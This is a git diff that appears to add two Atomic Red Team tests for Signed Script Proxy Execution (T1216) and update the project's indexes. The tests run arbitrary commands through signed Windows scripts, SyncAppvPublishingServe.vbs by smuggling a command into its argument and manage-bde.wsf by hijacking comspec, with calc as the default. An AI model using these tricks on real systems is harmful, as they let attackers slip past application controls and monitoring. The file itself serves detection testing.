diff --git a/atomics/T1216/T1216.md b/atomics/T1216/T1216.md
index 5e8bd42a..8df9785f 100644
--- a/atomics/T1216/T1216.md
+++ b/atomics/T1216/T1216.md
@@ -10,6 +10,10 @@ There are several other signed scripts that may be used in a similar manner. (Ci
 
 - [Atomic Test #1 - PubPrn.vbs Signed Script Bypass](#atomic-test-1---pubprnvbs-signed-script-bypass)
 
+- [Atomic Test #2 - SyncAppvPublishingServe Signed Script PowerShell Command Execution](#atomic-test-2---syncappvpublishingserve-signed-script-powershell-command-execution)
+
+- [Atomic Test #3 - manage-bde.wsf Signed Script Command Execution](#atomic-test-3---manage-bdewsf-signed-script-command-execution)
+
 
 <br/>
 
@@ -31,4 +35,55 @@ cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs local
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #2 - SyncAppvPublishingServe Signed Script PowerShell Command Execution
+Executes the signed SyncAppvPublishingServe script with options to execute an arbitrary PowerShell command.
+
+**Supported Platforms:** Windows
+
+
+#### Inputs
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| command_to_execute | A PowerShell command to execute. | string | Start-Process calc|
+
+#### Run it with `command_prompt`! 
+```
+C:\windows\system32\SyncAppvPublishingServe.vbs “\n;#{command_to_execute}”
+```
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #3 - manage-bde.wsf Signed Script Command Execution
+Executes the signed manage-bde.wsf script with options to execute an arbitrary command.
+
+**Supported Platforms:** Windows
+
+
+#### Inputs
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| command_to_execute | A command to execute. | Path | C:\Windows\System32\calc.exe|
+
+#### Run it with `command_prompt`! 
+```
+set comspec=#{command_to_execute}
+cscript manage-bde.wsf
+```
+
+#### Commands to Check Prerequisites:
+```
+
+```
+
+#### Cleanup Commands:
+```
+set comspec=C:\Windows\System32\cmd.exe
+```
+
 <br/>
diff --git a/atomics/T1216/T1216.yaml b/atomics/T1216/T1216.yaml
index 4de8acfa..dc422440 100644
--- a/atomics/T1216/T1216.yaml
+++ b/atomics/T1216/T1216.yaml
@@ -21,3 +21,45 @@ atomic_tests:
     elevation_required: false
     command: |
       cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "script:#{remote_payload}"
+
+- name: SyncAppvPublishingServe Signed Script PowerShell Command Execution
+  description: |
+    Executes the signed SyncAppvPublishingServe script with options to execute an arbitrary PowerShell command.
+
+  supported_platforms:
+    - windows
+
+  input_arguments:
+    command_to_execute:
+      description: A PowerShell command to execute.
+      type: string
+      default: Start-Process calc
+
+  executor:
+    name: command_prompt
+    elevation_required: false
+    command: |
+      C:\windows\system32\SyncAppvPublishingServe.vbs “\n;#{command_to_execute}”
+
+- name: manage-bde.wsf Signed Script Command Execution
+  description: |
+    Executes the signed manage-bde.wsf script with options to execute an arbitrary command.
+
+  supported_platforms:
+    - windows
+
+  input_arguments:
+    command_to_execute:
+      description: A command to execute.
+      type: Path
+      default: C:\Windows\System32\calc.exe
+
+  executor:
+    name: command_prompt
+    elevation_required: false
+    prereq_command: | # for the "command_prompt" executor, if any command returns a non-zero exit code, the pre-requisites are not met. For the "powershell" executor, all commands are run as a script block and the script block must return 0 for success. You can remove the prereq_command section if there are no pre-req's
+    command: | # these are the actaul attack commands, at least one command must be provided
+      set comspec=#{command_to_execute}
+      cscript manage-bde.wsf
+    cleanup_command: | # you can remove the cleanup_command section if there are no cleanup commands
+      set comspec=C:\Windows\System32\cmd.exe
\ No newline at end of file
diff --git a/atomics/index.md b/atomics/index.md
index e1b2e7c2..1f94994c 100644
--- a/atomics/index.md
+++ b/atomics/index.md
@@ -363,6 +363,8 @@
   - Atomic Test #8: InfDefaultInstall.exe .inf Execution [windows]
 - [T1216 Signed Script Proxy Execution](./T1216/T1216.md)
   - Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows]
+  - Atomic Test #2: SyncAppvPublishingServe Signed Script PowerShell Command Execution [windows]
+  - Atomic Test #3: manage-bde.wsf Signed Script Command Execution [windows]
 - T1045 Software Packing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1151 Space after Filename](./T1151/T1151.md)
   - Atomic Test #1: Space After Filename [macos]
@@ -747,6 +749,8 @@
   - Atomic Test #8: InfDefaultInstall.exe .inf Execution [windows]
 - [T1216 Signed Script Proxy Execution](./T1216/T1216.md)
   - Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows]
+  - Atomic Test #2: SyncAppvPublishingServe Signed Script PowerShell Command Execution [windows]
+  - Atomic Test #3: manage-bde.wsf Signed Script Command Execution [windows]
 - [T1153 Source](./T1153/T1153.md)
   - Atomic Test #1: Execute Script using Source [macos, linux]
   - Atomic Test #2: Execute Script using Source Alias [macos, linux]
diff --git a/atomics/index.yaml b/atomics/index.yaml
index 116f896d..8b5eb01f 100644
--- a/atomics/index.yaml
+++ b/atomics/index.yaml
@@ -10664,6 +10664,44 @@ defense-evasion:
           localhost "script:#{remote_payload}"
 
 '
+    - name: SyncAppvPublishingServe Signed Script PowerShell Command Execution
+      description: 'Executes the signed SyncAppvPublishingServe script with options
+        to execute an arbitrary PowerShell command.
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        command_to_execute:
+          description: A PowerShell command to execute.
+          type: string
+          default: Start-Process calc
+      executor:
+        name: command_prompt
+        elevation_required: false
+        command: 'C:\windows\system32\SyncAppvPublishingServe.vbs “\n;#{command_to_execute}”
+
+'
+    - name: manage-bde.wsf Signed Script Command Execution
+      description: 'Executes the signed manage-bde.wsf script with options to execute
+        an arbitrary command.
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        command_to_execute:
+          description: A command to execute.
+          type: Path
+          default: C:\Windows\System32\calc.exe
+      executor:
+        name: command_prompt
+        elevation_required: false
+        prereq_command: ''
+        command: |
+          set comspec=#{command_to_execute}
+          cscript manage-bde.wsf
+        cleanup_command: set comspec=C:\Windows\System32\cmd.exe
   T1151:
     technique:
       x_mitre_data_sources:
@@ -21091,6 +21129,44 @@ execution:
           localhost "script:#{remote_payload}"
 
 '
+    - name: SyncAppvPublishingServe Signed Script PowerShell Command Execution
+      description: 'Executes the signed SyncAppvPublishingServe script with options
+        to execute an arbitrary PowerShell command.
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        command_to_execute:
+          description: A PowerShell command to execute.
+          type: string
+          default: Start-Process calc
+      executor:
+        name: command_prompt
+        elevation_required: false
+        command: 'C:\windows\system32\SyncAppvPublishingServe.vbs “\n;#{command_to_execute}”
+
+'
+    - name: manage-bde.wsf Signed Script Command Execution
+      description: 'Executes the signed manage-bde.wsf script with options to execute
+        an arbitrary command.
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        command_to_execute:
+          description: A command to execute.
+          type: Path
+          default: C:\Windows\System32\calc.exe
+      executor:
+        name: command_prompt
+        elevation_required: false
+        prereq_command: ''
+        command: |
+          set comspec=#{command_to_execute}
+          cscript manage-bde.wsf
+        cleanup_command: set comspec=C:\Windows\System32\cmd.exe
   T1153:
     technique:
       x_mitre_data_sources:
diff --git a/atomics/windows-index.md b/atomics/windows-index.md
index a4a50715..2182952e 100644
--- a/atomics/windows-index.md
+++ b/atomics/windows-index.md
@@ -151,6 +151,8 @@
   - Atomic Test #8: InfDefaultInstall.exe .inf Execution [windows]
 - [T1216 Signed Script Proxy Execution](./T1216/T1216.md)
   - Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows]
+  - Atomic Test #2: SyncAppvPublishingServe Signed Script PowerShell Command Execution [windows]
+  - Atomic Test #3: manage-bde.wsf Signed Script Command Execution [windows]
 - T1045 Software Packing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1221 Template Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1099 Timestomp](./T1099/T1099.md)
@@ -609,6 +611,8 @@
   - Atomic Test #8: InfDefaultInstall.exe .inf Execution [windows]
 - [T1216 Signed Script Proxy Execution](./T1216/T1216.md)
   - Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows]
+  - Atomic Test #2: SyncAppvPublishingServe Signed Script PowerShell Command Execution [windows]
+  - Atomic Test #3: manage-bde.wsf Signed Script Command Execution [windows]
 - T1072 Third-party Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1127 Trusted Developer Utilities](./T1127/T1127.md)
   - Atomic Test #1: MSBuild Bypass Using Inline Tasks [windows]